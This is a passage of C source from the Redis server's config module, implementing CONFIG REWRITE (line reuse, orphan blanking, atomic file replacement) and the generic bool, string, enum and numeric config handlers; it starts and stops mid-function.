buf = sdscatprintf(buf,"%d", server.oom_score_adj_values[j]);
if (j != CONFIG_OOM_COUNT-1)
buf = sdscatlen(buf," ",1);
}
addReplyBulkCString(c,"oom-score-adj-values");
addReplyBulkCString(c,buf);
sdsfree(buf);
matches++;
}
setDeferredMapLen(c,replylen,matches);
}
/*-----------------------------------------------------------------------------
* CONFIG REWRITE implementation
*----------------------------------------------------------------------------*/
#define REDIS_CONFIG_REWRITE_SIGNATURE "# Generated by CONFIG REWRITE"
/* We use the following dictionary type to store where a configuration
* option is mentioned in the old configuration file, so it's
* like "maxmemory" -> list of line numbers (first line is zero). */
uint64_t dictSdsCaseHash(const void *key);
int dictSdsKeyCaseCompare(void *privdata, const void *key1, const void *key2);
void dictSdsDestructor(void *privdata, void *val);
void dictListDestructor(void *privdata, void *val);
/* Sentinel config rewriting is implemented inside sentinel.c by
* rewriteConfigSentinelOption(). */
void rewriteConfigSentinelOption(struct rewriteConfigState *state);
dictType optionToLineDictType = {
dictSdsCaseHash, /* hash function */
NULL, /* key dup */
NULL, /* val dup */
dictSdsKeyCaseCompare, /* key compare */
dictSdsDestructor, /* key destructor */
dictListDestructor /* val destructor */
};
dictType optionSetDictType = {
dictSdsCaseHash, /* hash function */
NULL, /* key dup */
NULL, /* val dup */
dictSdsKeyCaseCompare, /* key compare */
dictSdsDestructor, /* key destructor */
NULL /* val destructor */
};
/* The config rewrite state. */
struct rewriteConfigState {
dict *option_to_line; /* Option -> list of config file lines map */
dict *rewritten; /* Dictionary of already processed options */
int numlines; /* Number of lines in current config */
sds *lines; /* Current lines as an array of sds strings */
int has_tail; /* True if we already added directives that were
not present in the original config file. */
int force_all; /* True if we want all keywords to be force
written. Currently only used for testing. */
};
/* Append the new line to the current configuration state. */
void rewriteConfigAppendLine(struct rewriteConfigState *state, sds line) {
state->lines = zrealloc(state->lines, sizeof(char*) * (state->numlines+1));
state->lines[state->numlines++] = line;
}
/* Populate the option -> list of line numbers map. */
void rewriteConfigAddLineNumberToOption(struct rewriteConfigState *state, sds option, int linenum) {
list *l = dictFetchValue(state->option_to_line,option);
if (l == NULL) {
l = listCreate();
dictAdd(state->option_to_line,sdsdup(option),l);
}
listAddNodeTail(l,(void*)(long)linenum);
}
/* Add the specified option to the set of processed options.
* This is useful as only unused lines of processed options will be blanked
* in the config file, while options the rewrite process does not understand
* remain untouched. */
void rewriteConfigMarkAsProcessed(struct rewriteConfigState *state, const char *option) {
sds opt = sdsnew(option);
if (dictAdd(state->rewritten,opt,NULL) != DICT_OK) sdsfree(opt);
}
/* Read the old file, split it into lines to populate a newly created
* config rewrite state, and return it to the caller.
*
* If it is impossible to read the old file, NULL is returned.
* If the old file does not exist at all, an empty state is returned. */
struct rewriteConfigState *rewriteConfigReadOldFile(char *path) {
FILE *fp = fopen(path,"r");
if (fp == NULL && errno != ENOENT) return NULL;
char buf[CONFIG_MAX_LINE+1];
int linenum = -1;
struct rewriteConfigState *state = zmalloc(sizeof(*state));
state->option_to_line = dictCreate(&optionToLineDictType,NULL);
state->rewritten = dictCreate(&optionSetDictType,NULL);
state->numlines = 0;
state->lines = NULL;
state->has_tail = 0;
state->force_all = 0;
if (fp == NULL) return state;
/* Read the old file line by line, populate the state. */
while(fgets(buf,CONFIG_MAX_LINE+1,fp) != NULL) {
int argc;
sds *argv;
sds line = sdstrim(sdsnew(buf),"\r\n\t ");
linenum++; /* Zero based, so we init at -1 */
/* Handle comments and empty lines. */
if (line[0] == '#' || line[0] == '\0') {
if (!state->has_tail && !strcmp(line,REDIS_CONFIG_REWRITE_SIGNATURE))
state->has_tail = 1;
rewriteConfigAppendLine(state,line);
continue;
}
/* Not a comment, split into arguments. */
argv = sdssplitargs(line,&argc);
if (argv == NULL) {
/* Apparently the line is unparsable for some reason, for
* instance it may have unbalanced quotes. Load it as a
* comment. */
sds aux = sdsnew("# ??? ");
aux = sdscatsds(aux,line);
sdsfree(line);
rewriteConfigAppendLine(state,aux);
continue;
}
sdstolower(argv[0]); /* We only want lowercase config directives. */
/* Now we populate the state according to the content of this line.
* Append the line and populate the option -> line numbers map. */
rewriteConfigAppendLine(state,line);
/* Translate options using the word "slave" to the corresponding name
* "replica", before adding such option to the config name -> lines
* mapping. */
char *p = strstr(argv[0],"slave");
if (p) {
sds alt = sdsempty();
            alt = sdscatlen(alt,argv[0],p-argv[0]);
alt = sdscatlen(alt,"replica",7);
alt = sdscatlen(alt,p+5,strlen(p+5));
sdsfree(argv[0]);
argv[0] = alt;
}
rewriteConfigAddLineNumberToOption(state,argv[0],linenum);
sdsfreesplitres(argv,argc);
}
fclose(fp);
return state;
}
/* Rewrite the specified configuration option with the new "line".
* It progressively uses lines of the file that were already used for the same
* configuration option in the old version of the file, removing that line from
* the map of options -> line numbers.
*
 * If there are no lines already associated with the option, and "force" is
 * non-zero, the new line is appended at the end of the configuration file.
 * Usually "force" is true when an option does not have its default value,
 * so it must be rewritten even if it was not present previously.
*
* The first time a line is appended into a configuration file, a comment
* is added to show that starting from that point the config file was generated
* by CONFIG REWRITE.
*
* "line" is either used, or freed, so the caller does not need to free it
* in any way. */
void rewriteConfigRewriteLine(struct rewriteConfigState *state, const char *option, sds line, int force) {
sds o = sdsnew(option);
list *l = dictFetchValue(state->option_to_line,o);
rewriteConfigMarkAsProcessed(state,option);
if (!l && !force && !state->force_all) {
/* Option not used previously, and we are not forced to use it. */
sdsfree(line);
sdsfree(o);
return;
}
if (l) {
listNode *ln = listFirst(l);
int linenum = (long) ln->value;
/* There are still lines in the old configuration file we can reuse
* for this option. Replace the line with the new one. */
listDelNode(l,ln);
if (listLength(l) == 0) dictDelete(state->option_to_line,o);
sdsfree(state->lines[linenum]);
state->lines[linenum] = line;
} else {
/* Append a new line. */
if (!state->has_tail) {
rewriteConfigAppendLine(state,
sdsnew(REDIS_CONFIG_REWRITE_SIGNATURE));
state->has_tail = 1;
}
rewriteConfigAppendLine(state,line);
}
sdsfree(o);
}
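/* Worked example (illustrative): suppose the old file contains "save 900 1"
 * at one line and "save 300 10" at a later line. The first
 * rewriteConfigRewriteLine() call for "save" replaces the first of those lines
 * with the new text, the second call replaces the later one; a further call,
 * with no old lines left, appends after the CONFIG REWRITE signature. Any
 * "save" lines never reused are later blanked by
 * rewriteConfigRemoveOrphaned(). */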
/* Write the long long 'bytes' value as a string in a way that is parsable
* inside redis.conf. If possible uses the GB, MB, KB notation. */
int rewriteConfigFormatMemory(char *buf, size_t len, long long bytes) {
int gb = 1024*1024*1024;
int mb = 1024*1024;
int kb = 1024;
if (bytes && (bytes % gb) == 0) {
return snprintf(buf,len,"%lldgb",bytes/gb);
} else if (bytes && (bytes % mb) == 0) {
return snprintf(buf,len,"%lldmb",bytes/mb);
} else if (bytes && (bytes % kb) == 0) {
return snprintf(buf,len,"%lldkb",bytes/kb);
} else {
return snprintf(buf,len,"%lld",bytes);
}
}
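/* A few illustrative conversions produced by the function above:
 * 1073741824 -> "1gb", 7340032 -> "7mb", 10240 -> "10kb", 500 -> "500",
 * 0 -> "0". */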
/* Rewrite a simple "option-name <bytes>" configuration option. */
void rewriteConfigBytesOption(struct rewriteConfigState *state, const char *option, long long value, long long defvalue) {
char buf[64];
int force = value != defvalue;
sds line;
rewriteConfigFormatMemory(buf,sizeof(buf),value);
line = sdscatprintf(sdsempty(),"%s %s",option,buf);
rewriteConfigRewriteLine(state,option,line,force);
}
/* Rewrite a yes/no option. */
void rewriteConfigYesNoOption(struct rewriteConfigState *state, const char *option, int value, int defvalue) {
int force = value != defvalue;
sds line = sdscatprintf(sdsempty(),"%s %s",option,
value ? "yes" : "no");
rewriteConfigRewriteLine(state,option,line,force);
}
/* Rewrite a string option. */
void rewriteConfigStringOption(struct rewriteConfigState *state, const char *option, char *value, const char *defvalue) {
int force = 1;
sds line;
    /* String options set to NULL must not appear in the configuration file
     * at all, so that they are set back to NULL at the next restart. */
if (value == NULL) {
rewriteConfigMarkAsProcessed(state,option);
return;
}
/* Set force to zero if the value is set to its default. */
if (defvalue && strcmp(value,defvalue) == 0) force = 0;
line = sdsnew(option);
line = sdscatlen(line, " ", 1);
line = sdscatrepr(line, value, strlen(value));
rewriteConfigRewriteLine(state,option,line,force);
}
/* Rewrite a numerical (long long range) option. */
void rewriteConfigNumericalOption(struct rewriteConfigState *state, const char *option, long long value, long long defvalue) {
int force = value != defvalue;
sds line = sdscatprintf(sdsempty(),"%s %lld",option,value);
rewriteConfigRewriteLine(state,option,line,force);
}
/* Rewrite an octal option. */
void rewriteConfigOctalOption(struct rewriteConfigState *state, char *option, int value, int defvalue) {
int force = value != defvalue;
sds line = sdscatprintf(sdsempty(),"%s %o",option,value);
rewriteConfigRewriteLine(state,option,line,force);
}
/* Rewrite an enumeration option. It takes as usually state and option name,
* and in addition the enumeration array and the default value for the
* option. */
void rewriteConfigEnumOption(struct rewriteConfigState *state, const char *option, int value, configEnum *ce, int defval) {
sds line;
const char *name = configEnumGetNameOrUnknown(ce,value);
int force = value != defval;
line = sdscatprintf(sdsempty(),"%s %s",option,name);
rewriteConfigRewriteLine(state,option,line,force);
}
/* Rewrite the save option. */
void rewriteConfigSaveOption(struct rewriteConfigState *state) {
int j;
sds line;
/* In Sentinel mode we don't need to rewrite the save parameters */
if (server.sentinel_mode) {
rewriteConfigMarkAsProcessed(state,"save");
return;
}
/* Note that if there are no save parameters at all, all the current
     * config lines with "save" will be detected as orphaned and deleted,
     * resulting in no RDB persistence, as expected. */
for (j = 0; j < server.saveparamslen; j++) {
line = sdscatprintf(sdsempty(),"save %ld %d",
(long) server.saveparams[j].seconds, server.saveparams[j].changes);
rewriteConfigRewriteLine(state,"save",line,1);
}
/* Mark "save" as processed in case server.saveparamslen is zero. */
rewriteConfigMarkAsProcessed(state,"save");
}
/* Rewrite the user option. */
void rewriteConfigUserOption(struct rewriteConfigState *state) {
/* If there is a user file defined we just mark this configuration
* directive as processed, so that all the lines containing users
     * inside the config file get discarded. */
if (server.acl_filename[0] != '\0') {
rewriteConfigMarkAsProcessed(state,"user");
return;
}
/* Otherwise scan the list of users and rewrite every line. Note that
     * in case the list here is empty, the effect will just be to blank
     * all the user directives inside the config file. */
raxIterator ri;
raxStart(&ri,Users);
raxSeek(&ri,"^",NULL,0);
while(raxNext(&ri)) {
user *u = ri.data;
sds line = sdsnew("user ");
line = sdscatsds(line,u->name);
line = sdscatlen(line," ",1);
sds descr = ACLDescribeUser(u);
line = sdscatsds(line,descr);
sdsfree(descr);
rewriteConfigRewriteLine(state,"user",line,1);
}
raxStop(&ri);
/* Mark "user" as processed in case there are no defined users. */
rewriteConfigMarkAsProcessed(state,"user");
}
/* Rewrite the dir option, always using absolute paths.*/
void rewriteConfigDirOption(struct rewriteConfigState *state) {
char cwd[1024];
if (getcwd(cwd,sizeof(cwd)) == NULL) {
rewriteConfigMarkAsProcessed(state,"dir");
return; /* no rewrite on error. */
}
rewriteConfigStringOption(state,"dir",cwd,NULL);
}
/* Rewrite the slaveof option. */
void rewriteConfigSlaveofOption(struct rewriteConfigState *state, char *option) {
sds line;
/* If this is a master, we want all the slaveof config options
* in the file to be removed. Note that if this is a cluster instance
* we don't want a slaveof directive inside redis.conf. */
if (server.cluster_enabled || server.masterhost == NULL) {
rewriteConfigMarkAsProcessed(state,option);
return;
}
line = sdscatprintf(sdsempty(),"%s %s %d", option,
server.masterhost, server.masterport);
rewriteConfigRewriteLine(state,option,line,1);
}
/* Rewrite the notify-keyspace-events option. */
void rewriteConfigNotifykeyspaceeventsOption(struct rewriteConfigState *state) {
int force = server.notify_keyspace_events != 0;
char *option = "notify-keyspace-events";
sds line, flags;
flags = keyspaceEventsFlagsToString(server.notify_keyspace_events);
line = sdsnew(option);
line = sdscatlen(line, " ", 1);
line = sdscatrepr(line, flags, sdslen(flags));
sdsfree(flags);
rewriteConfigRewriteLine(state,option,line,force);
}
/* Rewrite the client-output-buffer-limit option. */
void rewriteConfigClientoutputbufferlimitOption(struct rewriteConfigState *state) {
int j;
char *option = "client-output-buffer-limit";
for (j = 0; j < CLIENT_TYPE_OBUF_COUNT; j++) {
int force = (server.client_obuf_limits[j].hard_limit_bytes !=
clientBufferLimitsDefaults[j].hard_limit_bytes) ||
(server.client_obuf_limits[j].soft_limit_bytes !=
clientBufferLimitsDefaults[j].soft_limit_bytes) ||
(server.client_obuf_limits[j].soft_limit_seconds !=
clientBufferLimitsDefaults[j].soft_limit_seconds);
sds line;
char hard[64], soft[64];
rewriteConfigFormatMemory(hard,sizeof(hard),
server.client_obuf_limits[j].hard_limit_bytes);
rewriteConfigFormatMemory(soft,sizeof(soft),
server.client_obuf_limits[j].soft_limit_bytes);
char *typename = getClientTypeName(j);
if (!strcmp(typename,"slave")) typename = "replica";
line = sdscatprintf(sdsempty(),"%s %s %s %s %ld",
option, typename, hard, soft,
(long) server.client_obuf_limits[j].soft_limit_seconds);
rewriteConfigRewriteLine(state,option,line,force);
}
}
/* Rewrite the oom-score-adj-values option. */
void rewriteConfigOOMScoreAdjValuesOption(struct rewriteConfigState *state) {
int force = 0;
int j;
char *option = "oom-score-adj-values";
sds line;
line = sdsnew(option);
line = sdscatlen(line, " ", 1);
for (j = 0; j < CONFIG_OOM_COUNT; j++) {
if (server.oom_score_adj_values[j] != configOOMScoreAdjValuesDefaults[j])
force = 1;
line = sdscatprintf(line, "%d", server.oom_score_adj_values[j]);
if (j+1 != CONFIG_OOM_COUNT)
line = sdscatlen(line, " ", 1);
}
rewriteConfigRewriteLine(state,option,line,force);
}
/* Rewrite the bind option. */
void rewriteConfigBindOption(struct rewriteConfigState *state) {
int force = 1;
sds line, addresses;
char *option = "bind";
/* Nothing to rewrite if we don't have bind addresses. */
if (server.bindaddr_count == 0) {
rewriteConfigMarkAsProcessed(state,option);
return;
}
/* Rewrite as bind <addr1> <addr2> ... <addrN> */
addresses = sdsjoin(server.bindaddr,server.bindaddr_count," ");
line = sdsnew(option);
line = sdscatlen(line, " ", 1);
line = sdscatsds(line, addresses);
sdsfree(addresses);
rewriteConfigRewriteLine(state,option,line,force);
}
/* Rewrite the requirepass option. */
void rewriteConfigRequirepassOption(struct rewriteConfigState *state, char *option) {
int force = 1;
sds line;
sds password = server.requirepass;
/* If there is no password set, we don't want the requirepass option
* to be present in the configuration at all. */
if (password == NULL) {
rewriteConfigMarkAsProcessed(state,option);
return;
}
line = sdsnew(option);
line = sdscatlen(line, " ", 1);
line = sdscatsds(line, password);
rewriteConfigRewriteLine(state,option,line,force);
}
/* Glue together the configuration lines in the current configuration
* rewrite state into a single string, stripping multiple empty lines. */
sds rewriteConfigGetContentFromState(struct rewriteConfigState *state) {
sds content = sdsempty();
int j, was_empty = 0;
for (j = 0; j < state->numlines; j++) {
/* Every cluster of empty lines is turned into a single empty line. */
if (sdslen(state->lines[j]) == 0) {
if (was_empty) continue;
was_empty = 1;
} else {
was_empty = 0;
}
content = sdscatsds(content,state->lines[j]);
content = sdscatlen(content,"\n",1);
}
return content;
}
/* Free the configuration rewrite state. */
void rewriteConfigReleaseState(struct rewriteConfigState *state) {
sdsfreesplitres(state->lines,state->numlines);
dictRelease(state->option_to_line);
dictRelease(state->rewritten);
zfree(state);
}
/* At the end of the rewrite process the state contains the remaining
* map between "option name" => "lines in the original config file".
* Lines used by the rewrite process were removed by the function
* rewriteConfigRewriteLine(), all the other lines are "orphaned" and
* should be replaced by empty lines.
*
* This function does just this, iterating all the option names and
* blanking all the lines still associated. */
void rewriteConfigRemoveOrphaned(struct rewriteConfigState *state) {
dictIterator *di = dictGetIterator(state->option_to_line);
dictEntry *de;
while((de = dictNext(di)) != NULL) {
list *l = dictGetVal(de);
sds option = dictGetKey(de);
/* Don't blank lines about options the rewrite process
         * doesn't understand. */
if (dictFind(state->rewritten,option) == NULL) {
serverLog(LL_DEBUG,"Not rewritten option: %s", option);
continue;
}
while(listLength(l)) {
listNode *ln = listFirst(l);
int linenum = (long) ln->value;
sdsfree(state->lines[linenum]);
state->lines[linenum] = sdsempty();
listDelNode(l,ln);
}
}
dictReleaseIterator(di);
}
/* This function replaces the old configuration file with the new content
* in an atomic manner.
*
* The function returns 0 on success, otherwise -1 is returned and errno
* is set accordingly. */
int rewriteConfigOverwriteFile(char *configfile, sds content) {
int fd = -1;
int retval = -1;
char tmp_conffile[PATH_MAX];
const char *tmp_suffix = ".XXXXXX";
size_t offset = 0;
ssize_t written_bytes = 0;
int tmp_path_len = snprintf(tmp_conffile, sizeof(tmp_conffile), "%s%s", configfile, tmp_suffix);
if (tmp_path_len <= 0 || (unsigned int)tmp_path_len >= sizeof(tmp_conffile)) {
serverLog(LL_WARNING, "Config file full path is too long");
errno = ENAMETOOLONG;
return retval;
}
#ifdef _GNU_SOURCE
fd = mkostemp(tmp_conffile, O_CLOEXEC);
#else
/* There's a theoretical chance here to leak the FD if a module thread forks & execv in the middle */
fd = mkstemp(tmp_conffile);
#endif
if (fd == -1) {
serverLog(LL_WARNING, "Could not create tmp config file (%s)", strerror(errno));
return retval;
}
while (offset < sdslen(content)) {
written_bytes = write(fd, content + offset, sdslen(content) - offset);
if (written_bytes <= 0) {
if (errno == EINTR) continue; /* FD is blocking, no other retryable errors */
serverLog(LL_WARNING, "Failed after writing (%zd) bytes to tmp config file (%s)", offset, strerror(errno));
goto cleanup;
}
offset+=written_bytes;
}
if (fsync(fd))
serverLog(LL_WARNING, "Could not sync tmp config file to disk (%s)", strerror(errno));
else if (fchmod(fd, 0644 & ~server.umask) == -1)
serverLog(LL_WARNING, "Could not chmod config file (%s)", strerror(errno));
else if (rename(tmp_conffile, configfile) == -1)
serverLog(LL_WARNING, "Could not rename tmp config file (%s)", strerror(errno));
else {
retval = 0;
serverLog(LL_DEBUG, "Rewritten config file (%s) successfully", configfile);
}
cleanup:
close(fd);
if (retval) unlink(tmp_conffile);
return retval;
}
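/* Design note (informational): writing to a mkstemp()-created temporary file
 * and then rename()-ing it over the original is what makes the overwrite
 * atomic: on POSIX, rename() within the same filesystem either fully replaces
 * the target or leaves it untouched, so readers never observe a partially
 * written config file. The fsync() above ensures the new content reaches disk
 * before the old file is replaced. */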
/* Rewrite the configuration file at "path".
 * If the configuration file already exists, we try our best to retain comments
* and overall structure.
*
* Configuration parameters that are at their default value, unless already
* explicitly included in the old configuration file, are not rewritten.
* The force_all flag overrides this behavior and forces everything to be
* written. This is currently only used for testing purposes.
*
* On error -1 is returned and errno is set accordingly, otherwise 0. */
int rewriteConfig(char *path, int force_all) {
struct rewriteConfigState *state;
sds newcontent;
int retval;
/* Step 1: read the old config into our rewrite state. */
if ((state = rewriteConfigReadOldFile(path)) == NULL) return -1;
if (force_all) state->force_all = 1;
/* Step 2: rewrite every single option, replacing or appending it inside
* the rewrite state. */
/* Iterate the configs that are standard */
for (standardConfig *config = configs; config->name != NULL; config++) {
config->interface.rewrite(config->data, config->name, state);
}
rewriteConfigBindOption(state);
rewriteConfigOctalOption(state,"unixsocketperm",server.unixsocketperm,CONFIG_DEFAULT_UNIX_SOCKET_PERM);
rewriteConfigStringOption(state,"logfile",server.logfile,CONFIG_DEFAULT_LOGFILE);
rewriteConfigSaveOption(state);
rewriteConfigUserOption(state);
rewriteConfigDirOption(state);
rewriteConfigSlaveofOption(state,"replicaof");
rewriteConfigRequirepassOption(state,"requirepass");
rewriteConfigBytesOption(state,"client-query-buffer-limit",server.client_max_querybuf_len,PROTO_MAX_QUERYBUF_LEN);
rewriteConfigStringOption(state,"cluster-config-file",server.cluster_configfile,CONFIG_DEFAULT_CLUSTER_CONFIG_FILE);
rewriteConfigNotifykeyspaceeventsOption(state);
rewriteConfigClientoutputbufferlimitOption(state);
rewriteConfigOOMScoreAdjValuesOption(state);
/* Rewrite Sentinel config if in Sentinel mode. */
if (server.sentinel_mode) rewriteConfigSentinelOption(state);
/* Step 3: remove all the orphaned lines in the old file, that is, lines
* that were used by a config option and are no longer used, like in case
* of multiple "save" options or duplicated options. */
rewriteConfigRemoveOrphaned(state);
/* Step 4: generate a new configuration file from the modified state
* and write it into the original file. */
newcontent = rewriteConfigGetContentFromState(state);
retval = rewriteConfigOverwriteFile(server.configfile,newcontent);
sdsfree(newcontent);
rewriteConfigReleaseState(state);
return retval;
}
/*-----------------------------------------------------------------------------
* Configs that fit one of the major types and require no special handling
*----------------------------------------------------------------------------*/
#define LOADBUF_SIZE 256
static char loadbuf[LOADBUF_SIZE];
#define MODIFIABLE_CONFIG 1
#define IMMUTABLE_CONFIG 0
#define embedCommonConfig(config_name, config_alias, is_modifiable) \
.name = (config_name), \
.alias = (config_alias), \
.modifiable = (is_modifiable),
#define embedConfigInterface(initfn, setfn, getfn, rewritefn) .interface = { \
.init = (initfn), \
.set = (setfn), \
.get = (getfn), \
.rewrite = (rewritefn) \
},
/* What follows is the generic config types that are supported. To add a new
* config with one of these types, add it to the standardConfig table with
* the creation macro for each type.
*
* Each type contains the following:
* * A function defining how to load this type on startup.
* * A function defining how to update this type on CONFIG SET.
 * * A function defining how to serialize this type on CONFIG GET.
* * A function defining how to rewrite this type on CONFIG REWRITE.
* * A Macro defining how to create this type.
*/
/* Bool Configs */
static void boolConfigInit(typeData data) {
*data.yesno.config = data.yesno.default_value;
}
static int boolConfigSet(typeData data, sds value, int update, char **err) {
int yn = yesnotoi(value);
if (yn == -1) {
*err = "argument must be 'yes' or 'no'";
return 0;
}
if (data.yesno.is_valid_fn && !data.yesno.is_valid_fn(yn, err))
return 0;
int prev = *(data.yesno.config);
*(data.yesno.config) = yn;
if (update && data.yesno.update_fn && !data.yesno.update_fn(yn, prev, err)) {
*(data.yesno.config) = prev;
return 0;
}
return 1;
}
static void boolConfigGet(client *c, typeData data) {
addReplyBulkCString(c, *data.yesno.config ? "yes" : "no");
}
static void boolConfigRewrite(typeData data, const char *name, struct rewriteConfigState *state) {
rewriteConfigYesNoOption(state, name,*(data.yesno.config), data.yesno.default_value);
}
#define createBoolConfig(name, alias, modifiable, config_addr, default, is_valid, update) { \
embedCommonConfig(name, alias, modifiable) \
embedConfigInterface(boolConfigInit, boolConfigSet, boolConfigGet, boolConfigRewrite) \
.data.yesno = { \
.config = &(config_addr), \
.default_value = (default), \
.is_valid_fn = (is_valid), \
.update_fn = (update), \
} \
}
/* String Configs */
static void stringConfigInit(typeData data) {
if (data.string.convert_empty_to_null) {
*data.string.config = data.string.default_value ? zstrdup(data.string.default_value) : NULL;
} else {
*data.string.config = zstrdup(data.string.default_value);
}
}
static int stringConfigSet(typeData data, sds value, int update, char **err) {
if (data.string.is_valid_fn && !data.string.is_valid_fn(value, err))
return 0;
char *prev = *data.string.config;
if (data.string.convert_empty_to_null) {
*data.string.config = value[0] ? zstrdup(value) : NULL;
} else {
*data.string.config = zstrdup(value);
}
if (update && data.string.update_fn && !data.string.update_fn(*data.string.config, prev, err)) {
zfree(*data.string.config);
*data.string.config = prev;
return 0;
}
zfree(prev);
return 1;
}
static void stringConfigGet(client *c, typeData data) {
addReplyBulkCString(c, *data.string.config ? *data.string.config : "");
}
static void stringConfigRewrite(typeData data, const char *name, struct rewriteConfigState *state) {
rewriteConfigStringOption(state, name,*(data.string.config), data.string.default_value);
}
#define ALLOW_EMPTY_STRING 0
#define EMPTY_STRING_IS_NULL 1
#define createStringConfig(name, alias, modifiable, empty_to_null, config_addr, default, is_valid, update) { \
embedCommonConfig(name, alias, modifiable) \
embedConfigInterface(stringConfigInit, stringConfigSet, stringConfigGet, stringConfigRewrite) \
.data.string = { \
.config = &(config_addr), \
.default_value = (default), \
.is_valid_fn = (is_valid), \
.update_fn = (update), \
.convert_empty_to_null = (empty_to_null), \
} \
}
/* Enum configs */
static void enumConfigInit(typeData data) {
*data.enumd.config = data.enumd.default_value;
}
static int enumConfigSet(typeData data, sds value, int update, char **err) {
int enumval = configEnumGetValue(data.enumd.enum_value, value);
if (enumval == INT_MIN) {
sds enumerr = sdsnew("argument must be one of the following: ");
configEnum *enumNode = data.enumd.enum_value;
while(enumNode->name != NULL) {
enumerr = sdscatlen(enumerr, enumNode->name,
strlen(enumNode->name));
enumerr = sdscatlen(enumerr, ", ", 2);
enumNode++;
}
sdsrange(enumerr,0,-3); /* Remove final ", ". */
strncpy(loadbuf, enumerr, LOADBUF_SIZE);
loadbuf[LOADBUF_SIZE - 1] = '\0';
sdsfree(enumerr);
*err = loadbuf;
return 0;
}
if (data.enumd.is_valid_fn && !data.enumd.is_valid_fn(enumval, err))
return 0;
int prev = *(data.enumd.config);
*(data.enumd.config) = enumval;
if (update && data.enumd.update_fn && !data.enumd.update_fn(enumval, prev, err)) {
*(data.enumd.config) = prev;
return 0;
}
return 1;
}
static void enumConfigGet(client *c, typeData data) {
addReplyBulkCString(c, configEnumGetNameOrUnknown(data.enumd.enum_value,*data.enumd.config));
}
static void enumConfigRewrite(typeData data, const char *name, struct rewriteConfigState *state) {
rewriteConfigEnumOption(state, name,*(data.enumd.config), data.enumd.enum_value, data.enumd.default_value);
}
#define createEnumConfig(name, alias, modifiable, enum, config_addr, default, is_valid, update) { \
embedCommonConfig(name, alias, modifiable) \
embedConfigInterface(enumConfigInit, enumConfigSet, enumConfigGet, enumConfigRewrite) \
.data.enumd = { \
.config = &(config_addr), \
.default_value = (default), \
.is_valid_fn = (is_valid), \
.update_fn = (update), \
.enum_value = (enum), \
} \
}
/* Gets a 'long long val' and sets it into the union, using a macro to get
* compile time type check. */
#define SET_NUMERIC_TYPE(val) \
if (data.numeric.numeric_type == NUMERIC_TYPE_INT) { \
*(data.numeric.config.i) = (int) val; \
} else if (data.numeric.numeric_type == NUMERIC_TYPE_UINT) { \
*(data.numeric.config.ui) = (unsigned int) val; \
} else if (data.numeric.numeric_type == NUMERIC_TYPE_LONG) { \
*(data.numeric.config.l) = (long) val; \
} else if (data.numeric.numeric_type == NUMERIC_TYPE_ULONG) { \
*(data.numeric.config.ul) = (unsigned long) val; \
} else if (data.numeric.numeric_type == NUMERIC_TYPE_LONG_LONG) { \
*(data.numeric.config.ll) = (long long) val; \
} else if (data.numeric.numeric_type == NUMERIC_TYPE_ULONG_LONG) { \
*(data.numeric.config.ull) = (unsigned long long) val; \
} else if (data.numeric.numeric_type == NUMERIC_TYPE_SIZE_T) { \
*(data.numeric.config.st) = (size_t) val; \
} else if (data.numeric.numeric_type == NUMERIC_TYPE_SSIZE_T) { \
*(data.numeric.config.sst) = (ssize_t) val; \
} else if (data.numeric.numeric_type == NUMERIC_TYPE_OFF_T) { \
*(data.numeric.config.ot) = (off_t) val; \
} else if (data.numeric.numeric_type == NUMERIC_TYPE_TIME_T) { \
*(data.numeric.config.tt) = (time_t) val; \
}
/* Gets a 'long long val' and sets it with the value from the union, using a
* macro to get compile time type check. */
#define GET_NUMERIC_TYPE(val) \
if (data.numeric.numeric_type == NUMERIC_TYPE_INT) { \
val = *(data.numeric.config.i); \
} else if (data.numeric.numeric_type == NUMERIC_TYPE_UINT) { \
val = *(data.numeric.config.ui); \
} else if (data.numeric.numeric_type == NUMERIC_TYPE_LONG) { \
val = *(data.numeric.config.l); \
} else if (data.numeric.numeric_type == NUMERIC_TYPE_ULONG) { \
val = *(data.numeric.config.ul); \
} else if (data.numeric.numeric_type == NUMERIC_TYPE_LONG_LONG) { \
val = *(data.numeric.config.ll); \
} else if (data.numeric.numeric_type == NUMERIC_TYPE_ULONG_LONG) { \
val = *(data.numeric.config.ull); \
} else if (data.numeric.numeric_type == NUMERIC_TYPE_SIZE_T) { \
val = *(data.numeric.config.st); \
} else if (data.numeric.numeric_type == NUMERIC_TYPE_SSIZE_T) { \
val = *(data.numeric.config.sst); \
} else if (data.numeric.numeric_type == NUMERIC_TYPE_OFF_T) { \
val = *(data.numeric.config.ot); \
} else if (data.numeric.numeric_type == NUMERIC_TYPE_TIME_T) { \
val = *(data.numeric.config.tt); \
}
/* Numeric configs */
static void numericConfigInit(typeData data) {
SET_NUMERIC_TYPE(data.numeric.default_value)
}
static int numericBoundaryCheck(typeData data, long long ll, char **err) {
if (data.numeric.numeric_type == NUMERIC_TYPE_ULONG_LONG ||
data.numeric.numeric_type == NUMERIC_TYPE_UINT ||
data.numeric.numeric_type == NUMERIC_TYPE_SIZE_T) {
/* Boundary check for unsigned types */
unsigned long long ull = ll;
unsigned long long upper_bound = data.numeric.upper_bound;
unsigned long long lower_bound = data.numeric.lower_bound;
if (ull > upper_bound || ull < lower_bound) {
snprintf(loadbuf, LOADBUF_SIZE,
"argument must be between %llu and %llu inclusive",
lower_bound,
upper_bound);
*err = loadbuf;
return 0;
}
} else {
/* Boundary check for signed types */
if (ll > data.numeric.upper_bound || ll < data.numeric.lower_bound) {
snprintf(loadbuf, LOADBUF_SIZE,
"argument must be between %lld and %lld inclusive",
data.numeric.lower_bound,
data.numeric.upper_bound);
*err = loadbuf;
return 0;
}
}
return 1;
}
static int numericConfigSet(typeData data, sds value, int update, char **err) {
long long ll, prev = 0;
if (data.numeric.is_memory) {
int memerr;
ll = memtoll(value, &memerr);
if (memerr || ll < 0) {
*err = "argument must be a memory value";
return 0;
}
} else {
if (!string2ll(value, sdslen(value),&ll)) {
*err = "argument couldn't be parsed into an integer" ;
return 0;
}
}
if (!numericBoundaryCheck(data, ll, err))
return 0;
if (data.numeric.is_valid_fn && !data.numeric.is_valid_fn(ll, err))
return 0;
GET_NUMERIC_TYPE(prev)
SET_NUMERIC_TYPE(ll)
if (update && data.numeric.update_fn && !data.numeric.update_fn(ll, prev, err)) {
SET_NUMERIC_TYPE(prev)
return 0;
}
return 1;
}
static void numericConfigGet(client *c, typeData data) {
char buf[128];
long long value = 0;
GET_NUMERIC_TYPE(value)
ll2string(buf, sizeof(buf), value);
addReplyBulkCString(c, buf);
}
static void numericConfigRewrite(typeData data, const char *name, struct rewriteConfigState *state) {
long long value = 0;
GET_NUMERIC_TYPE(value)
if (data.numeric.is_memory) {
